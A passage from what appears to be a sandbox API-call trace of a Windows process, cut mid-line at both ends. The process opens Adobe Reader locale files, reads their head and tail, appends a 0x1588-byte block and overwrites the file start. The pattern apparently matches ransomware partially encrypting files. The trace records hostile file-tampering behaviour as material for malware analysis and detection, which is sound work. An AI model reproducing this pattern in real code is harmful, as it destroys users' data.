lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.736] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0079.736] WriteFile (in: hFile=0x1e4, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0079.737] CloseHandle (hObject=0x1e4) returned 1 [0079.737] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\Annots.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\annots.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0079.738] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0079.738] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x56c00 [0079.738] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0079.738] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.738] ReleaseMutex (hMutex=0x168) returned 1 [0079.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.JPN", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0079.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.JPN", cchWideChar=10, lpMultiByteStr=0x1f7346c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Annots.JPN", lpUsedDefaultChar=0x0) returned 10 [0079.739] ReadFile (in: hFile=0x1e4, lpBuffer=0x2891de8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2891de8*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0079.847] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x55c00 [0079.847] ReadFile (in: hFile=0x1e4, lpBuffer=0x2663838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0080.989] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x55c00 [0080.990] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0080.990] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0080.990] WriteFile (in: hFile=0x1e4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0080.991] CloseHandle (hObject=0x1e4) returned 1 [0080.991] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\makeaccessible.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\makeaccessible.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0080.991] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0080.991] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xb600 [0080.992] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0080.992] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0080.992] ReleaseMutex (hMutex=0x168) returned 1 [0080.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.JPN", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0080.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.JPN", cchWideChar=18, lpMultiByteStr=0x1f88c44, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="makeaccessible.JPN", lpUsedDefaultChar=0x0) returned 18 [0080.992] ReadFile (in: hFile=0x1e4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0080.998] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xa600 [0080.999] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0081.002] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xa600 [0081.002] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.002] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0081.002] WriteFile (in: hFile=0x1e4, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0081.002] CloseHandle (hObject=0x1e4) returned 1 [0081.003] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\Search.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\search.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0081.003] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0081.003] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4400 [0081.003] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0081.003] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.003] ReleaseMutex (hMutex=0x168) returned 1 [0081.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.JPN", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0081.004] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.JPN", cchWideChar=10, lpMultiByteStr=0x1f7352c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Search.JPN", lpUsedDefaultChar=0x0) returned 10 [0081.004] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0081.005] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3400 [0081.005] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0081.010] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3400 [0081.010] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.011] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0081.011] WriteFile (in: hFile=0x1e4, lpBuffer=0x2668898*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2668898*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.011] CloseHandle (hObject=0x1e4) returned 1 [0081.011] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Acroform.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\acroform.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0081.012] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0081.012] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x48c00 [0081.012] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0081.012] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.012] ReleaseMutex (hMutex=0x168) returned 1 [0081.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.KOR", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.KOR", cchWideChar=12, lpMultiByteStr=0x1f735ec, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acroform.KOR", lpUsedDefaultChar=0x0) returned 12 [0081.012] ReadFile (in: hFile=0x1e4, lpBuffer=0x25a4048, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0081.017] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x47c00 [0081.017] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0081.025] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x47c00 [0081.025] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.025] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0081.026] WriteFile (in: hFile=0x1e4, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0081.026] CloseHandle (hObject=0x1e4) returned 1 [0081.026] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\EScript.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\escript.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0081.027] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0081.027] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x7e00 [0081.027] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0081.027] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.027] ReleaseMutex (hMutex=0x168) returned 1 [0081.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.KOR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0081.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.KOR", cchWideChar=11, lpMultiByteStr=0x1f7328c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EScript.KOR", lpUsedDefaultChar=0x0) returned 11 [0081.027] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0081.069] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x6e00 [0081.069] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0081.079] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x6e00 [0081.079] WriteFile (in: hFile=0x1e4, lpBuffer=0x28731e8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28731e8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.080] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0081.080] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.080] CloseHandle (hObject=0x1e4) returned 1 [0081.081] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\reflow.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\reflow.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0081.081] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0081.081] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1000 [0081.081] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0081.081] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.082] ReleaseMutex (hMutex=0x168) returned 1 [0081.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.KOR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0081.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.KOR", cchWideChar=10, lpMultiByteStr=0x1f7360c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="reflow.KOR", lpUsedDefaultChar=0x0) returned 10 [0081.082] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf2bc*=0x1000, lpOverlapped=0x0) returned 1 [0081.269] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0081.269] WriteFile (in: hFile=0x1e4, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x1588, lpOverlapped=0x0) returned 1 [0081.269] CloseHandle (hObject=0x1e4) returned 1 [0081.271] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Weblink.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\weblink.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0081.273] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0081.273] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x5600 [0081.273] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0081.273] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.273] ReleaseMutex (hMutex=0x168) returned 1 [0081.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.KOR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0081.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.KOR", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Weblink.KOR", lpUsedDefaultChar=0x0) returned 11 [0081.273] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0081.385] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x4600 [0081.385] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0081.399] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x4600 [0081.399] WriteFile (in: hFile=0x1e4, lpBuffer=0x2692de8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.400] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0081.400] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.400] CloseHandle (hObject=0x1e4) returned 1 [0081.400] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\DVA.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\dva.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0081.401] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0081.401] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4600 [0081.401] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0081.401] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.402] ReleaseMutex (hMutex=0x168) returned 1 [0081.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.NOR", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0081.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.NOR", cchWideChar=7, lpMultiByteStr=0x1f7abf4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVA.NOR", lpUsedDefaultChar=0x0) returned 7 [0081.402] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0081.426] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3600 [0081.426] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0081.442] SetFilePointer (in: hFile=0x1e4, 